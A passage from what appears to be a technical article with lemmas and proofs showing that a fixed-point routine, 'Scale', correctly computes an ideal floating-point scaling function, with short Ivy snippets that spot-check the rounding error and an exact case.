-moz-left;'><mtext>[simplifying]</mtext></mtd></mtr><mtr><mtd><mrow></mrow></mtd><mtd><mo>=</mo></mtd><mtd style='text-align: left; text-align: -webkit-left; text-align: -moz-left;'><mrow><mo stretchy=false>⌊</mo><mn>2</mn><mo>·</mo><mi>x</mi><mo>·</mo><mn>2</mn><msup><mspace height='0.66em' /><mi>e</mi></msup><mo>·</mo><mn>10</mn><msup><mspace height='0.66em' /><mi>p</mi></msup><mo stretchy=false>⌋</mo></mrow></mtd><mtd style='text-align: left; text-align: -webkit-left; text-align: -moz-left;'><mtext>[rearranging]</mtext></mtd></mtr><mtr><mtd style='text-align: right; text-align: -webkit-right; text-align: -moz-right;'><mrow><MI>𝑚𝑖𝑑𝑑𝑙𝑒</MI><msup><mspace height='0.66em' /><mi>ℝ</mi></msup><mo>≠</mo><mn>0</mn><mspace width='0.3em' /><mtext>or</mtext><mspace width='0.3em' /><MI>𝑏𝑜𝑡𝑡𝑜𝑚</MI><msup><mspace height='0.66em' /><mi>ℝ</mi></msup><mo>≠</mo><mn>0</mn></mrow></mtd><mtd><mo>=</mo></mtd><mtd style='text-align: left; text-align: -webkit-left; text-align: -moz-left;'><mrow><mrow><mo stretchy=false>⌊</mo><mi>x</mi><mo>·</mo><MI>𝑝𝑚</MI><mn>/2</mn><msup><mspace height='0.66em' /><mi>b</mi></msup><mo stretchy=false>⌋</mo></mrow><MO>mod</MO><mn>2</mn><msup><mspace height='0.66em' /><mi>m</mi></msup><mo>≠</mo><mn>0</mn><mspace width='0.3em' /><mtext>or</mtext><mspace width='0.3em' /><mi>x</mi><MO>mod</MO><mn>2</mn><msup><mspace height='0.66em' /><mi>b</mi></msup><mo>≠</mo><mn>0</mn></mrow></mtd><mtd style='text-align: left; text-align: -webkit-left; text-align: -moz-left;'><mrow><mrow><mtext>[definition</mtext><mspace width='0.3em' /><mtext>of</mtext><mspace width='0.3em' /></mrow><MI>𝑚𝑖𝑑𝑑𝑙𝑒</MI><msup><mspace height='0.66em' /><mi>ℝ</mi></msup><mo>,</mo><MI>𝑏𝑜𝑡𝑡𝑜𝑚</MI><msup><mspace height='0.66em' /><mi>ℝ</mi></msup><mtext>]</mtext></mrow></mtd></mtr><mtr><mtd><mrow></mrow></mtd><mtd><mo>=</mo></mtd><mtd style='text-align: left; text-align: -webkit-left; text-align: -moz-left;'><mrow><mi>x</mi><mo>·</mo><MI>𝑝𝑚</MI><msup><mspace height='0.66em' /><mi>ℝ</mi></msup><MO>mod</MO><mn>2</mn><msup><mspace height='0.66em' /><mrow><mi>m</mi><mo>+</mo><mi>b</mi></mrow></msup><mo>≠</mo><mn>0</mn></mrow></mtd><mtd style='text-align: left; text-align: -webkit-left; text-align: -moz-left;'><mtext>[simplifying]</mtext></mtd></mtr><mtr><mtd><mrow></mrow></mtd><mtd><mo>=</mo></mtd><mtd style='text-align: left; text-align: -webkit-left; text-align: -moz-left;'><mrow><mrow><mo stretchy=false>⌊</mo><mi>x</mi><mo>·</mo><MI>𝑝𝑚</MI><msup><mspace height='0.66em' /><mi>ℝ</mi></msup><mn>/2</mn><msup><mspace height='0.66em' /><mrow><mi>m</mi><mo>+</mo><mi>b</mi></mrow></msup><mo stretchy=false>⌋</mo></mrow><mo>≠</mo><mi>x</mi><mo>·</mo><MI>𝑝𝑚</MI><msup><mspace height='0.66em' /><mi>ℝ</mi></msup><mn>/2</mn><msup><mspace height='0.66em' /><mrow><mi>m</mi><mo>+</mo><mi>b</mi></mrow></msup></mrow></mtd><mtd style='text-align: left; text-align: -webkit-left; text-align: -moz-left;'><mrow><mtext>[definition</mtext><mspace width='0.3em' /><mtext>of</mtext><mspace width='0.3em' /><mtext>floor</mtext><mspace width='0.3em' /><mtext>and</mtext><mspace width='0.3em' /><mtext>mod]</mtext></mrow></mtd></mtr><mtr><mtd><mrow></mrow></mtd><mtd><mo>=</mo></mtd><mtd style='text-align: left; text-align: -webkit-left; text-align: -moz-left;'><mrow><mrow><mo stretchy=false>⌊</mo><mn>2</mn><mo>·</mo><mi>x</mi><mo>·</mo><mn>2</mn><msup><mspace height='0.66em' /><mi>e</mi></msup><mo>·</mo><mn>10</mn><msup><mspace height='0.66em' /><mi>p</mi></msup><mo 
stretchy=false>⌋</mo></mrow><mo>≠</mo><mn>2</mn><mo>·</mo><mi>x</mi><mo>·</mo><mn>2</mn><msup><mspace height='0.66em' /><mi>e</mi></msup><mo>·</mo><mn>10</mn><msup><mspace height='0.66em' /><mi>p</mi></msup></mrow></mtd><mtd style='text-align: left; text-align: -webkit-left; text-align: -moz-left;'><mrow><mrow><mtext>[reusing</mtext><mspace width='0.3em' /><mtext>expansion</mtext><mspace width='0.3em' /><mtext>of</mtext><mspace width='0.3em' /></mrow><mi>x</mi><mo>·</mo><MI>𝑝𝑚</MI><msup><mspace height='0.66em' /><mi>ℝ</mi></msup><mn>/2</mn><msup><mspace height='0.66em' /><mi>m</mi></msup><mn>/2</mn><msup><mspace height='0.66em' /><mi>b</mi></msup><mtext>above]</mtext></mrow></mtd></mtr><mtr><mtd style='text-align: right; text-align: -webkit-right; text-align: -moz-right;'><mrow><mtext>Scale</mtext><msup><mspace height='0.66em' /><mi>ℝ</mi></msup></mrow></mtd><mtd><mo>=</mo></mtd><mtd style='text-align: left; text-align: -webkit-left; text-align: -moz-left;'><mrow><MI>𝑡𝑜𝑝</MI><msup><mspace height='0.66em' /><mi>ℝ</mi></msup><mspace width='0.166em' /><mn>||</mn><mspace width='0.166em' /><mo stretchy=false>(</mo><MI>𝑚𝑖𝑑𝑑𝑙𝑒</MI><msup><mspace height='0.66em' /><mi>ℝ</mi></msup><mo>≠</mo><mn>0</mn><mspace width='0.3em' /><mtext>or</mtext><mspace width='0.3em' /><MI>𝑏𝑜𝑡𝑡𝑜𝑚</MI><msup><mspace height='0.66em' /><mi>ℝ</mi></msup><mo>≠</mo><mn>0</mn><mo stretchy=false>)</mo></mrow></mtd><mtd style='text-align: left; text-align: -webkit-left; text-align: -moz-left;'><mrow><mrow><mtext>[definition</mtext><mspace width='0.3em' /><mtext>of</mtext><mspace width='0.3em' /></mrow><mtext>Scale</mtext><msup><mspace height='0.66em' /><mi>ℝ</mi></msup><mtext>]</mtext></mrow></mtd></mtr><mtr><mtd><mrow></mrow></mtd><mtd><mo>=</mo></mtd><mtd style='text-align: left; text-align: -webkit-left; text-align: -moz-left;'><mrow><mrow><mo stretchy=false>⌊</mo><mn>2</mn><mo>·</mo><mi>x</mi><mo>·</mo><mn>2</mn><msup><mspace height='0.66em' /><mi>e</mi></msup><mo>·</mo><mn>10</mn><msup><mspace height='0.66em' /><mi>p</mi></msup><mo stretchy=false>⌋</mo></mrow><mspace width='0.166em' /><mn>||</mn><mspace width='0.166em' /><mrow><mo stretchy=false>⌊</mo><mn>2</mn><mo>·</mo><mi>x</mi><mo>·</mo><mn>2</mn><msup><mspace height='0.66em' /><mi>e</mi></msup><mo>·</mo><mn>10</mn><msup><mspace height='0.66em' /><mi>p</mi></msup><mo stretchy=false>⌋</mo></mrow><mo>≠</mo><mn>2</mn><mo>·</mo><mi>x</mi><mo>·</mo><mn>2</mn><msup><mspace height='0.66em' /><mi>e</mi></msup><mo>·</mo><mn>10</mn><msup><mspace height='0.66em' /><mi>p</mi></msup></mrow></mtd><mtd style='text-align: left; text-align: -webkit-left; text-align: -moz-left;'><mrow><mtext>[applying</mtext><mspace width='0.3em' /><mtext>previous</mtext><mspace width='0.3em' /><mtext>two</mtext><mspace width='0.3em' /><mtext>expansions]</mtext></mrow></mtd></mtr><mtr><mtd><mrow></mrow></mtd><mtd><mo>=</mo></mtd><mtd style='text-align: left; text-align: -webkit-left; text-align: -moz-left;'><mrow><mo>⟨</mo><mi>x</mi><mo>·</mo><mn>2</mn><msup><mspace height='0.66em' /><mi>e</mi></msup><mo>·</mo><mn>10</mn><msup><mspace height='0.66em' /><mi>p</mi></msup><mo>⟩</mo></mrow></mtd><mtd style='text-align: left; text-align: -webkit-left; text-align: -moz-left;'><mrow><mrow><mtext>[definition</mtext><mspace width='0.3em' /><mtext>of</mtext><mspace width='0.3em' /></mrow><mrow><mo>⟨</mo><mspace width='0.166em' /><mn>.</mn><mspace width='0.166em' /><mn>.</mn><mspace width='0.166em' /><mn>.</mn><mspace width='0.166em' 
/><mo>⟩</mo></mrow><mtext>]</mtext></mrow></mtd></mtr><mtr><mtd><mrow></mrow></mtd><mtd><mo>=</mo></mtd><mtd style='text-align: left; text-align: -webkit-left; text-align: -moz-left;'><mrow><mtext>uscale</mtext><mo stretchy=false>(</mo><mi>x</mi><mo>,</mo><mi>e</mi><mo>,</mo><mi>p</mi><mo stretchy=false>)</mo></mrow></mtd><mtd style='text-align: left; text-align: -webkit-left; text-align: -moz-left;'><mrow><mtext>[definition</mtext><mspace width='0.3em' /><mtext>of</mtext><mspace width='0.3em' /><mtext>scale]</mtext></mrow></mtd></mtr></mtable></math></div>
<p>
So <math><mrow><mtext>Scale</mtext><msup><mspace height='0.66em' /><mi>ℝ</mi></msup><mo stretchy=false>(</mo><mi>x</mi><mo>,</mo><mi>e</mi><mo>,</mo><mi>p</mi><mo stretchy=false>)</mo></mrow></math> computes <math><mrow><mtext>uscale</mtext><mo stretchy=false>(</mo><mi>x</mi><mo>,</mo><mi>e</mi><mo>,</mo><mi>p</mi><mo stretchy=false>)</mo></mrow></math>. <math><mo>∎</mo></math>
</div>
<p>
Next we can establish basic conditions that make <math><mtext>Scale</mtext></math> correct.
<div class=lemma id=lemma2>
<p>
<b>Lemma 2</b>. If <math><mrow><MI>𝑡𝑜𝑝</MI><mo>=</mo><MI>𝑡𝑜𝑝</MI><msup><mspace height='0.66em' /><mi>ℝ</mi></msup></mrow></math> and <math><mrow><mo stretchy=false>(</mo><MI>𝑚𝑖𝑑𝑑𝑙𝑒</MI><mo>≠</mo><mn>0</mn><mo stretchy=false>)</mo><mo>≡</mo><mo stretchy=false>(</mo><MI>𝑚𝑖𝑑𝑑𝑙𝑒</MI><msup><mspace height='0.66em' /><mi>ℝ</mi></msup><mspace width='0.166em' /><MO>||</MO><mspace width='0.166em' /><MI>𝑏𝑜𝑡𝑡𝑜𝑚</MI><msup><mspace height='0.66em' /><mi>ℝ</mi></msup><mo>≠</mo><mn>0</mn><mo stretchy=false>)</mo></mrow></math>,
then <math><mtext>Scale</mtext></math> computes <math><mrow><mtext>uscale</mtext><mo stretchy=false>(</mo><mi>x</mi><mo>,</mo><mi>e</mi><mo>,</mo><mi>p</mi><mo stretchy=false>)</mo></mrow></math>.
<p>
<i>Proof</i>. <math><mrow><mtext>Scale</mtext><msup><mspace height='0.66em' /><mi>ℝ</mi></msup><mo stretchy=false>(</mo><mi>x</mi><mo>,</mo><mi>e</mi><mo>,</mo><mi>p</mi><mo stretchy=false>)</mo><mo>=</mo><MI>𝑡𝑜𝑝</MI><msup><mspace height='0.66em' /><mi>ℝ</mi></msup><mspace width='0.166em' /><MO>||</MO><mspace width='0.166em' /><mo stretchy=false>(</mo><MI>𝑚𝑖𝑑𝑑𝑙𝑒</MI><msup><mspace height='0.66em' /><mi>ℝ</mi></msup><mspace width='0.166em' /><MO>||</MO><mspace width='0.166em' /><MI>𝑏𝑜𝑡𝑡𝑜𝑚</MI><msup><mspace height='0.66em' /><mi>ℝ</mi></msup><mo>≠</mo><mn>0</mn><mo stretchy=false>)</mo></mrow></math>,
while <math><mrow><mtext>Scale</mtext><mo stretchy=false>(</mo><mi>x</mi><mo>,</mo><mi>e</mi><mo>,</mo><mi>p</mi><mo stretchy=false>)</mo><mo>=</mo><MI>𝑡𝑜𝑝</MI><mspace width='0.166em' /><MO>||</MO><mspace width='0.166em' /><mo stretchy=false>(</mo><MI>𝑚𝑖𝑑𝑑𝑙𝑒</MI><mo>≠</mo><mn>0</mn><mo stretchy=false>)</mo></mrow></math>.
If <math><mrow><MI>𝑡𝑜𝑝</MI><mo>=</mo><MI>𝑡𝑜𝑝</MI><msup><mspace height='0.66em' /><mi>ℝ</mi></msup></mrow></math> and <math><mrow><mo stretchy=false>(</mo><MI>𝑚𝑖𝑑𝑑𝑙𝑒</MI><mo>≠</mo><mn>0</mn><mo stretchy=false>)</mo><mo>≡</mo><mo stretchy=false>(</mo><MI>𝑚𝑖𝑑𝑑𝑙𝑒</MI><msup><mspace height='0.66em' /><mi>ℝ</mi></msup><mspace width='0.166em' /><MO>||</MO><mspace width='0.166em' /><MI>𝑏𝑜𝑡𝑡𝑜𝑚</MI><msup><mspace height='0.66em' /><mi>ℝ</mi></msup><mo>≠</mo><mn>0</mn><mo stretchy=false>)</mo></mrow></math>,
then these expressions are identical.
Since <math><mrow><mtext>Scale</mtext><msup><mspace height='0.66em' /><mi>ℝ</mi></msup><mo stretchy=false>(</mo><mi>x</mi><mo>,</mo><mi>e</mi><mo>,</mo><mi>p</mi><mo stretchy=false>)</mo></mrow></math> computes <math><mrow><mtext>uscale</mtext><mo stretchy=false>(</mo><mi>x</mi><mo>,</mo><mi>e</mi><mo>,</mo><mi>p</mi><mo stretchy=false>)</mo></mrow></math> (by <a href="#lemma1">Lemma 1</a>), so does <math><mrow><mtext>Scale</mtext><mo stretchy=false>(</mo><mi>x</mi><mo>,</mo><mi>e</mi><mo>,</mo><mi>p</mi><mo stretchy=false>)</mo></mrow></math>. <math><mo>∎</mo></math>
</div>
<p>
Now we need to show that <math><mrow><MI>𝑡𝑜𝑝</MI><mo>=</mo><MI>𝑡𝑜𝑝</MI><msup><mspace height='0.66em' /><mi>ℝ</mi></msup></mrow></math> and <math><mrow><mo stretchy=false>(</mo><MI>𝑚𝑖𝑑𝑑𝑙𝑒</MI><mo>≠</mo><mn>0</mn><mo stretchy=false>)</mo><mo>≡</mo><mo stretchy=false>(</mo><MI>𝑚𝑖𝑑𝑑𝑙𝑒</MI><msup><mspace height='0.66em' /><mi>ℝ</mi></msup><mspace width='0.166em' /><MO>||</MO><mspace width='0.166em' /><MI>𝑏𝑜𝑡𝑡𝑜𝑚</MI><msup><mspace height='0.66em' /><mi>ℝ</mi></msup><mo>≠</mo><mn>0</mn><mo stretchy=false>)</mo></mrow></math>
in all cases.
We will also show that <math><mrow><MI>𝑚𝑖𝑑𝑑𝑙𝑒</MI><mo>≠</mo><mn>1</mn></mrow></math> to justify using
<math><mrow><MI>𝑚𝑖𝑑𝑑𝑙𝑒</MI><mo>≥</mo><mn>2</mn></mrow></math> in place of <math><mrow><MI>𝑚𝑖𝑑𝑑𝑙𝑒</MI><mo>≠</mo><mn>0</mn></mrow></math> when that’s convenient.
<p>
Note that <math><mrow><MI>𝑝𝑚</MI><mo>=</mo><mrow><mo stretchy=false>⌈</mo><MI>𝑝𝑚</MI><msup><mspace height='0.66em' /><mi>ℝ</mi></msup><mo stretchy=false>⌉</mo></mrow><mo>=</mo><MI>𝑝𝑚</MI><msup><mspace height='0.66em' /><mi>ℝ</mi></msup><mo>+</mo><mi>ε</mi><msub><mspace height='0em' /><mn>0</mn></msub></mrow></math> for <math><mrow><mi>ε</mi><msub><mspace height='0em' /><mn>0</mn></msub><mo>∈</mo><mo stretchy=false>[</mo><mn>0</mn><mo>,</mo><mn>1</mn><mo stretchy=false>)</mo></mrow></math>, and so:<div class=math><math display=block><mtable><mtr><mtd style='text-align: right; text-align: -webkit-right; text-align: -moz-right;'><mrow><mi>x</mi><mo>·</mo><MI>𝑝𝑚</MI></mrow></mtd><mtd><mo>=</mo></mtd><mtd style='text-align: left; text-align: -webkit-left; text-align: -moz-left;'><mrow><mi>x</mi><mo>·</mo><mo stretchy=false>(</mo><MI>𝑝𝑚</MI><msup><mspace height='0.66em' /><mi>ℝ</mi></msup><mo>+</mo><mi>ε</mi><msub><mspace height='0em' /><mn>0</mn></msub><mo stretchy=false>)</mo></mrow></mtd></mtr><mtr><mtd><mrow></mrow></mtd><mtd><mo>=</mo></mtd><mtd style='text-align: left; text-align: -webkit-left; text-align: -moz-left;'><mrow><mi>x</mi><mo>·</mo><MI>𝑝𝑚</MI><msup><mspace height='0.66em' /><mi>ℝ</mi></msup><mo>+</mo><mi>ε</mi><msub><mspace height='0em' /><mn>1</mn></msub><mo>,</mo><mspace width='2em' /><mi>ε</mi><msub><mspace height='0em' /><mn>1</mn></msub><mo>=</mo><mi>x</mi><mo>·</mo><mi>ε</mi><msub><mspace height='0em' /><mn>0</mn></msub><mo>∈</mo><mo stretchy=false>[</mo><mn>0</mn><mo>,</mo><mn>2</mn><msup><mspace height='0.66em' /><mi>b</mi></msup><mo stretchy=false>)</mo></mrow></mtd></mtr><mtr><mtd style='text-align: right; text-align: -webkit-right; text-align: -moz-right;'><mrow><MI>𝑡𝑜𝑝</MI><mspace width='0.166em' /><MO>||</MO><mspace width='0.166em' /><MI>𝑚𝑖𝑑𝑑𝑙𝑒</MI><mspace width='0.166em' /><MO>||</MO><mspace width='0.166em' /><MI>𝑏𝑜𝑡𝑡𝑜𝑚</MI></mrow></mtd><mtd><mo>=</mo></mtd><mtd style='text-align: left; text-align: -webkit-left; text-align: -moz-left;'><mrow><MI>𝑡𝑜𝑝</MI><msup><mspace height='0.66em' /><mi>ℝ</mi></msup><mspace width='0.166em' /><MO>||</MO><mspace width='0.166em' /><MI>𝑚𝑖𝑑𝑑𝑙𝑒</MI><msup><mspace height='0.66em' /><mi>ℝ</mi></msup><mspace width='0.166em' /><MO>||</MO><mspace width='0.166em' /><MI>𝑏𝑜𝑡𝑡𝑜𝑚</MI><msup><mspace height='0.66em' /><mi>ℝ</mi></msup><mo>+</mo><mi>ε</mi><msub><mspace height='0em' /><mn>1</mn></msub></mrow></mtd></mtr></mtable></math></div>
<p>
The proof analyzes the effect of the addition of <math><mrow><mi>ε</mi><msub><mspace height='0em' /><mn>1</mn></msub></mrow></math>
to the ideal result <math><mrow><MI>𝑡𝑜𝑝</MI><msup><mspace height='0.66em' /><mi>ℝ</mi></msup><mspace width='0.166em' /><MO>||</MO><mspace width='0.166em' /><MI>𝑚𝑖𝑑𝑑𝑙𝑒</MI><msup><mspace height='0.66em' /><mi>ℝ</mi></msup><mspace width='0.166em' /><MO>||</MO><mspace width='0.166em' /><MI>𝑏𝑜𝑡𝑡𝑜𝑚</MI><msup><mspace height='0.66em' /><mi>ℝ</mi></msup></mrow></math>.
Since <math><mrow><MI>𝑏𝑜𝑡𝑡𝑜𝑚</MI><msup><mspace height='0.66em' /><mi>ℝ</mi></msup></mrow></math> is <math><mi>b</mi></math> bits and <math><mrow><mi>ε</mi><msub><mspace height='0em' /><mn>1</mn></msub></mrow></math> is at most <math><mi>b</mi></math> bits,
adding <math><mrow><mi>ε</mi><msub><mspace height='0em' /><mn>1</mn></msub><mo>></mo><mn>0</mn></mrow></math> always causes <math><mrow><MI>𝑏𝑜𝑡𝑡𝑜𝑚</MI><mo>≠</mo><MI>𝑏𝑜𝑡𝑡𝑜𝑚</MI><msup><mspace height='0.66em' /><mi>ℝ</mi></msup></mrow></math>.
(Talking about the low <math><mi>b</mi></math> bits of a real number is unusual;
we mean the low <math><mi>b</mi></math> integer bits followed by all the fractional bits: <math><mrow><mi>x</mi><mo>·</mo><MI>𝑝𝑚</MI><msup><mspace height='0.66em' /><mi>ℝ</mi></msup><MO>mod</MO><mn>2</mn><msup><mspace height='0.66em' /><mi>b</mi></msup></mrow></math>.)
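<p>
A quick Ivy spot-check of this error for one power (<code>pmr</code> is an illustrative helper for the exact <math><mrow><MI>𝑝𝑚</MI><msup><mspace height='0.66em' /><mi>ℝ</mi></msup></mrow></math>):
<pre class='language-ivy'>op pe p = -(127+ceil 2 log 10**-p)
op pm p = ceil (10**p) / 2**pe p
op pmr p = (10**p) / 2**pe p
e0 = (pm -29) - (pmr -29)
# both print 1: the rounding error e0 lies in [0,1)
0 <= e0
e0 < 1
</pre>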
<p>
The question is whether that addition overflows and propagates
a carry into <math><MI>𝑚𝑖𝑑𝑑𝑙𝑒</MI></math> or even <math><MI>𝑡𝑜𝑝</MI></math>.
There are two main cases: exact results <math><mrow><mo stretchy=false>(</mo><MI>𝑚𝑖𝑑𝑑𝑙𝑒</MI><msup><mspace height='0.66em' /><mi>ℝ</mi></msup><mspace width='0.166em' /><MO>||</MO><mspace width='0.166em' /><MI>𝑏𝑜𝑡𝑡𝑜𝑚</MI><msup><mspace height='0.66em' /><mi>ℝ</mi></msup><mo>=</mo><mn>0</mn><mo stretchy=false>)</mo></mrow></math>
and inexact results <math><mrow><mo stretchy=false>(</mo><MI>𝑚𝑖𝑑𝑑𝑙𝑒</MI><msup><mspace height='0.66em' /><mi>ℝ</mi></msup><mspace width='0.166em' /><MO>||</MO><mspace width='0.166em' /><MI>𝑏𝑜𝑡𝑡𝑜𝑚</MI><msup><mspace height='0.66em' /><mi>ℝ</mi></msup><mo>≠</mo><mn>0</mn><mo stretchy=false>)</mo></mrow></math>.
<a class=anchor href="#exact_results"><h2 id="exact_results">Exact Results</h2></a>
<p>
Exact results have no error, making them match <math><mrow><mtext>Scale</mtext><msup><mspace height='0.66em' /><mi>ℝ</mi></msup></mrow></math> exactly.
<div class=lemma id=lemma3>
<p>
<b>Lemma 3</b>. For exact results, <math><mtext>Scale</mtext></math> computes <math><mrow><mtext>uscale</mtext><mo stretchy=false>(</mo><mi>x</mi><mo>,</mo><mi>e</mi><mo>,</mo><mi>p</mi><mo stretchy=false>)</mo></mrow></math> and <math><mrow><MI>𝑚𝑖𝑑𝑑𝑙𝑒</MI><mo>≠</mo><mn>1</mn></mrow></math>.
<p>
<i>Proof</i>. For an exact result, <math><mrow><MI>𝑚𝑖𝑑𝑑𝑙𝑒</MI><msup><mspace height='0.66em' /><mi>ℝ</mi></msup><mspace width='0.166em' /><MO>||</MO><mspace width='0.166em' /><MI>𝑏𝑜𝑡𝑡𝑜𝑚</MI><msup><mspace height='0.66em' /><mi>ℝ</mi></msup><mo>=</mo><mn>0</mn></mrow></math>,
meaning <math><mrow><mn>2</mn><mo>·</mo><mi>x</mi><mo>·</mo><mn>2</mn><msup><mspace height='0.66em' /><mi>e</mi></msup><mo>·</mo><mn>10</mn><msup><mspace height='0.66em' /><mi>p</mi></msup></mrow></math> is an integer
and the sticky bit is 0.
Since <math><mrow><MI>𝑏𝑜𝑡𝑡𝑜𝑚</MI><msup><mspace height='0.66em' /><mi>ℝ</mi></msup></mrow></math> is <math><mi>b</mi></math> zero bits, adding <math><mrow><mi>ε</mi><msub><mspace height='0em' /><mn>1</mn></msub></mrow></math> affects
<math><MI>𝑏𝑜𝑡𝑡𝑜𝑚</MI></math> but does not carry into <math><MI>𝑚𝑖𝑑𝑑𝑙𝑒</MI></math> or <math><MI>𝑡𝑜𝑝</MI></math>.
Therefore <math><mrow><MI>𝑡𝑜𝑝</MI><mo>=</mo><MI>𝑡𝑜𝑝</MI><msup><mspace height='0.66em' /><mi>ℝ</mi></msup></mrow></math> and <math><mrow><MI>𝑚𝑖𝑑𝑑𝑙𝑒</MI><mo>=</mo><MI>𝑚𝑖𝑑𝑑𝑙𝑒</MI><msup><mspace height='0.66em' /><mi>ℝ</mi></msup><mo>=</mo><mn>0</mn></mrow></math>.
The latter, combined with <math><mrow><MI>𝑏𝑜𝑡𝑡𝑜𝑚</MI><msup><mspace height='0.66em' /><mi>ℝ</mi></msup><mo>=</mo><mn>0</mn></mrow></math>,
makes <math><mrow><mo stretchy=false>(</mo><MI>𝑚𝑖𝑑𝑑𝑙𝑒</MI><mo>≠</mo><mn>0</mn><mo stretchy=false>)</mo><mo>≡</mo><mo stretchy=false>(</mo><MI>𝑚𝑖𝑑𝑑𝑙𝑒</MI><msup><mspace height='0.66em' /><mi>ℝ</mi></msup><mspace width='0.166em' /><MO>||</MO><mspace width='0.166em' /><MI>𝑏𝑜𝑡𝑡𝑜𝑚</MI><msup><mspace height='0.66em' /><mi>ℝ</mi></msup><mo>≠</mo><mn>0</mn><mo stretchy=false>)</mo></mrow></math> trivially true
(both sides are false).
By <a href="#lemma2">Lemma 2</a>, <math><mtext>Scale</mtext></math> is correct.
And since <math><mrow><MI>𝑚𝑖𝑑𝑑𝑙𝑒</MI><mo>=</mo><mn>0</mn></mrow></math>, <math><mrow><MI>𝑚𝑖𝑑𝑑𝑙𝑒</MI><mo>≠</mo><mn>1</mn></mrow></math>.
<math><mo>∎</mo></math>
</div>
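<p>
An exact case is easy to watch in Ivy (a sketch: with <math><mrow><mi>x</mi><mo>=</mo><mn>1</mn></mrow></math>, <math><mrow><mi>e</mi><mo>=</mo><mn>0</mn></mrow></math>, <math><mrow><mi>p</mi><mo>=</mo><mn>1</mn></mrow></math>, the scaled value <math><mrow><mn>2</mn><mo>·</mo><mi>x</mi><mo>·</mo><mn>2</mn><msup><mspace height='0.66em' /><mi>e</mi></msup><mo>·</mo><mn>10</mn><msup><mspace height='0.66em' /><mi>p</mi></msup></mrow></math> is exactly 20):
<pre class='language-ivy'>op pe p = -(127+ceil 2 log 10**-p)
op pm p = ceil (10**p) / 2**pe p
x = 1
p = 1
b = 1
# with e = 0, m = -(e + pe + b + 1)
m = -((pe p) + b + 1)
prod = x * pm p
middle = (prod >> b) mod 2**m
# prints 0: no carry reaches middle
middle
# prints 40, the unrounded form of 10 (integer part 10, half bit 0, sticky bit 0)
(2 * (prod >> (m+b))) + (middle != 0)
</pre>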
<a class=anchor href="#inexact_results"><h2 id="inexact_results">Inexact Results</h2></a>
<p>
Inexact results are more work.
We will reduce the correctness to a few conditions on <math><MI>𝑚𝑖𝑑𝑑𝑙𝑒</MI></math>.
<div class=lemma id=lemma4>
<p>
<b>Lemma 4.</b> For inexact results, if <math><mrow><MI>𝑚𝑖𝑑𝑑𝑙𝑒</MI><mo>≠</mo><mn>0</mn></mrow></math>, then <math><mrow><mtext>Scale</mtext><mo stretchy=false>(</mo><mi>x</mi><mo>,</mo><mi>e</mi><mo>,</mo><mi>p</mi><mo stretchy=false>)</mo></mrow></math> computes <math><mrow><mtext>uscale</mtext><mo stretchy=false>(</mo><mi>x</mi><mo>,</mo><mi>e</mi><mo>,</mo><mi>p</mi><mo stretchy=false>)</mo></mrow></math>.
<p>
<i>Proof</i>. For an inexact result, <math><mrow><MI>𝑚𝑖𝑑𝑑𝑙𝑒</MI><msup><mspace height='0.66em' /><mi>ℝ</mi></msup><mspace width='0.166em' /><MO>||</MO><mspace width='0.166em' /><MI>𝑏𝑜𝑡𝑡𝑜𝑚</MI><msup><mspace height='0.66em' /><mi>ℝ</mi></msup><mo>≠</mo><mn>0</mn></mrow></math>.
The only possible change from <math><mrow><MI>𝑚𝑖𝑑𝑑𝑙𝑒</MI><msup><mspace height='0.66em' /><mi>ℝ</mi></msup></mrow></math> to <math><MI>𝑚𝑖𝑑𝑑𝑙𝑒</MI></math> is a carry
from the error addition <math><mrow><MI>𝑏𝑜𝑡𝑡𝑜𝑚</MI><msup><mspace height='0.66em' /><mi>ℝ</mi></msup><mo>+</mo><mi>ε</mi><msub><mspace height='0em' /><mn>1</mn></msub></mrow></math> overflowing <math><MI>𝑏𝑜𝑡𝑡𝑜𝑚</MI></math>.
That carry is at most 1, so <math><mrow><MI>𝑚𝑖𝑑𝑑𝑙𝑒</MI><mo>=</mo><mo stretchy=false>(</mo><MI>𝑚𝑖𝑑𝑑𝑙𝑒</MI><msup><mspace height='0.66em' /><mi>ℝ</mi></msup><mo>+</mo><mi>ε</mi><msub><mspace height='0em' /><mn>2</mn></msub><mo stretchy=false>)</mo><MO>mod</MO><mn>2</mn><msup><mspace height='0.66em' /><mi>m</mi></msup></mrow></math>
for <math><mrow><mi>ε</mi><msub><mspace height='0em' /><mn>2</mn></msub><mo>∈</mo><mo stretchy=false>[</mo><mn>0</mn><mo>,</mo><mn>1</mn><mo stretchy=false>]</mo></mrow></math>.
An overflow into <math><MI>𝑡𝑜𝑝</MI></math> leaves <math><mrow><MI>𝑚𝑖𝑑𝑑𝑙𝑒</MI><mo>=</mo><mn>0</mn></mrow></math>.
If <math><mrow><MI>𝑚𝑖𝑑𝑑𝑙𝑒</MI><mo>≠</mo><mn>0</mn></mrow></math> then there can be no overflow, so <math><mrow><MI>𝑡𝑜𝑝</MI><mo>=</mo><MI>𝑡𝑜𝑝</MI><msup><mspace height='0.66em' /><mi>ℝ</mi></msup></mrow></math>.
By <a href="#lemma2">Lemma 2</a>, <math><mtext>Scale</mtext></math> computes <math><mrow><mtext>uscale</mtext><mo stretchy=false>(</mo><mi>x</mi><mo>,</mo><mi>e</mi><mo>,</mo><mi>p</mi><mo stretchy=false>)</mo></mrow></math>. <math><mo>∎</mo></math>
</div>
<p>
For some cases, it will be more convenient to prove the range of <math><mrow><MI>𝑚𝑖𝑑𝑑𝑙𝑒</MI><msup><mspace height='0.66em' /><mi>ℝ</mi></msup></mrow></math>
instead of the range of <math><MI>𝑚𝑖𝑑𝑑𝑙𝑒</MI></math>. For that we can use a variant of <a href="#lemma4">Lemma 4</a>.
<div class=lemma id=lemma5>
<p>
<b>Lemma 5.</b> For inexact results, if <math><mrow><MI>𝑚𝑖𝑑𝑑𝑙𝑒</MI><msup><mspace height='0.66em' /><mi>ℝ</mi></msup><mo>∈</mo><mo stretchy=false>[</mo><mn>1</mn><mo>,</mo><mn>2</mn><msup><mspace height='0.66em' /><mi>m</mi></msup><mo>−</mo><mn>2</mn><mo stretchy=false>]</mo></mrow></math> then <math><mrow><mtext>Scale</mtext><mo stretchy=false>(</mo><mi>x</mi><mo>,</mo><mi>e</mi><mo>,</mo><mi>p</mi><mo stretchy=false>)</mo></mrow></math> computes <math><mrow><mtext>uscale</mtext><mo stretchy=false>(</mo><mi>x</mi><mo>,</mo><mi>e</mi><mo>,</mo><mi>p</mi><mo stretchy=false>)</mo></mrow></math>.
<p>
